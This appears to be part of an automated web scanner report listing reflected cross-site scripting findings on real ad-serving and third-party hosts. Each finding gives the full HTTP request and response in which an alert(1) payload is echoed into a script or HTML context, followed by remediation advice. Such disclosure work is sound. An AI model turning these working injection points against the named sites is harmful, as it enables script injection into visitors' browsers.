This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload eb032<img%20src%3da%20onerror%3dalert(1)>8b99717b9c6 was submitted in the msessionkey parameter. This input was echoed as eb032<img src=a onerror=alert(1)>8b99717b9c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 8ef88%0a4a4a6ebaf7c was submitted in the site parameter. This input was echoed as 8ef88 4a4a6ebaf7c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 16:24:32 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT Content-Length: 2141 Content-Type: application/x-javascript Set-Cookie: ASPSESSIONIDQCQBRCDS=NBOOLMLDFMJDCHCCGJELJLJM; path=/ Cache-control: public, max-age=3600, s-maxage=3600
//Plugins for site 105028888ef88 4a4a6ebaf7c lpAddMonitorTag(); typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem ...[SNIP]...
The value of the 173663;201;js;MSN;300x250Retargeting/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74525"-alert(1)-"b573390ac42 was submitted in the 173663;201;js;MSN;300x250Retargeting/?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=74525"-alert(1)-"b573390ac42&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Wed, 03 Aug 2011 12:40:29 GMT Server: Jetty(6.1.22) Content-Type: text/javascript Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Connection: keep-alive Content-Length: 577
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221014001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=74525"-alert(1)-"b573390ac42&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1df02"-alert(1)-"a409d46f3c0 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.47755064071df02"-alert(1)-"a409d46f3c0 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Wed, 03 Aug 2011 12:40:51 GMT Server: Jetty(6.1.22) Content-Type: text/javascript Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Connection: keep-alive Content-Length: 577
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221314001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.47755064071df02"-alert(1)-"a409d46f3c0"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7d85"-alert(1)-"ea0dbd3b447 was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=c7d85"-alert(1)-"ea0dbd3b447&ftscw=&cachebuster=765046.4775506407 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Wed, 03 Aug 2011 12:40:42 GMT Server: Jetty(6.1.22) Content-Type: text/javascript Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Connection: keep-alive Content-Length: 577
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221014001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=c7d85"-alert(1)-"ea0dbd3b447&ftscw=&cachebuster=765046.4775506407"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54a8e"-alert(1)-"29096755ce7 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=54a8e"-alert(1)-"29096755ce7&cachebuster=765046.4775506407 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Wed, 03 Aug 2011 12:40:46 GMT Server: Jetty(6.1.22) Content-Type: text/javascript Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Connection: keep-alive Content-Length: 577
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221014001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=54a8e"-alert(1)-"29096755ce7&cachebuster=765046.4775506407"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b22e"-alert(1)-"fea16b4d912 was submitted in the ftx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=9b22e"-alert(1)-"fea16b4d912&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Date: Wed, 03 Aug 2011 12:40:33 GMT P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Server: Jetty(6.1.22) Content-Type: text/javascript Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Connection: keep-alive Content-Length: 577
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221314001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=9b22e"-alert(1)-"fea16b4d912&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0cd8"-alert(1)-"436f8610cd4 was submitted in the fty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=d0cd8"-alert(1)-"436f8610cd4&ftadz=&ftscw=&cachebuster=765046.4775506407 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Wed, 03 Aug 2011 12:40:38 GMT Server: Jetty(6.1.22) Content-Type: text/javascript Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Connection: keep-alive Content-Length: 577
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221314001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=d0cd8"-alert(1)-"436f8610cd4&ftadz=&ftscw=&cachebuster=765046.4775506407"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
2.151. http://servedby.flashtalking.com/imp/1/16780 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://servedby.flashtalking.com
Path:
/imp/1/16780
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 479d2"-alert(1)-"3e9411785fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp/1/16780;173663;201;js;MSN;300x250Retargeting/?click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407&479d2"-alert(1)-"3e9411785fc=1 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9R25&cb=1630601381 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Wed, 03 Aug 2011 12:40:55 GMT Server: Jetty(6.1.22) Content-Type: text/javascript Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Connection: keep-alive Content-Length: 580
var ftGUID_173663="1310110B6FAA0E"; var ftConfID_173663="221014001"; var ftParams_173663="click=http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.229476819.229475388;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=765046.4775506407&479d2"-alert(1)-"3e9411785fc=1"; var ftKeyword_173663=""; var ftSegment_173663=""; var ftSegmentList_173663=[]; var ftRuleMatch_173663="0";
The value of the 89704;201;js;MMN;300x250RON/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b356"-alert(1)-"5c5b4b4f79 was submitted in the 89704;201;js;MMN;300x250RON/?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:02:13 GMT Server: Jetty(6.1.22) Content-Length: 570 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 iad061104000000 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="135427"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=7b356"-alert(1)-"5c5b4b4f79&ftx=&fty=&ftadz=&ftscw=&cachebuster=402290.103957057"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adb3c"-alert(1)-"9434c654dac was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:02:15 GMT Server: Jetty(6.1.22) Content-Length: 571 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 iad061102000000 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="155402"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=402290.103957057adb3c"-alert(1)-"9434c654dac"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f25c"-alert(1)-"be4ab3bf776 was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:02:27 GMT Server: Jetty(6.1.22) Cache-Control: no-cache, no-store Content-Length: 571 content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 iad061106 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="155402"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=8f25c"-alert(1)-"be4ab3bf776&ftscw=&cachebuster=402290.103957057"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 934d9"-alert(1)-"34c51e25eb9 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:02:32 GMT Server: Jetty(6.1.22) Cache-Control: no-cache, no-store Content-Length: 571 content-type: text/javascript P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" pragma: no-cache Via: 1.1 iad061106 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="135427"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=934d9"-alert(1)-"34c51e25eb9&cachebuster=402290.103957057"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fce0"-alert(1)-"4c220599aef was submitted in the ftx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:02:18 GMT Server: Jetty(6.1.22) Cache-Control: no-cache, no-store Content-Length: 571 pragma: no-cache content-type: text/javascript P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 iad061106 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="155402"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=2fce0"-alert(1)-"4c220599aef&fty=&ftadz=&ftscw=&cachebuster=402290.103957057"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e708d"-alert(1)-"6f2d8ccd6e1 was submitted in the fty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:02:22 GMT Server: Jetty(6.1.22) Cache-Control: no-cache, no-store Content-Length: 571 content-type: text/javascript P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" pragma: no-cache Via: 1.1 iad061105 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="155351"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=e708d"-alert(1)-"6f2d8ccd6e1&ftadz=&ftscw=&cachebuster=402290.103957057"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
2.158. http://servedby.flashtalking.com/imp/14565 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://servedby.flashtalking.com
Path:
/imp/14565
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caef3"-alert(1)-"6f562582133 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:02:42 GMT Server: Jetty(6.1.22) Content-Length: 574 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 iad061106 (MII-APC/2.0)
var ftGUID_89704="1310110B6FAA0E"; var ftConfID_89704="137521"; var ftParams_89704="click=http://clk.atdmt.com/go/msnkxmbu0010002154mbu/direct;wi.300;hi.250;ai.205024531.197961682;ct.1/01?href=&ftx=&fty=&ftadz=&ftscw=&cachebuster=402290.103957057&caef3"-alert(1)-"6f562582133=1"; var ftKeyword_89704=""; var ftSegment_89704=""; var ftSegmentList_89704=[]; var ftRuleMatch_89704="0";
The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload f5503%0a8a1cfed8918 was submitted in the site parameter. This input was echoed as f5503 8a1cfed8918 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /visitor/addons/deploy.asp?site=72961245f5503%0a8a1cfed8918&d_id=sales HTTP/1.1 Host: sr2.liveperson.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 2141 Cache-Control: public, max-age=3600 Date: Thu, 04 Aug 2011 02:30:16 GMT Connection: close
//Plugins for site 72961245f5503 8a1cfed8918 lpAddMonitorTag(); typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem ...[SNIP]...
The value of the callbackName request parameter is copied into the HTML document as plain text between tags. The payload fd9b0<script>alert(1)</script>2d73c8cea1 was submitted in the callbackName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1a24'-alert(1)-'4213cf6f59e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /worldservice/jsd1a24'-alert(1)-'4213cf6f59e/site_catalyst/s_code_bbcws.js?_=1312371710710 HTTP/1.1 Host: wscdn.bbc.co.uk User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://verde.br.msn.com/tubar%c3%a3o-de-500-kg-pula-dentro-de-barco-na-%c3%a1frica-do-sul-1
Response
HTTP/1.1 404 Not Found Server: Apache Accept-Ranges: bytes Content-Type: text/html Cache-Control: private, max-age=31535999 Date: Wed, 03 Aug 2011 11:42:11 GMT Content-Length: 24278 Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f09e'-alert(1)-'3f555978f4d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
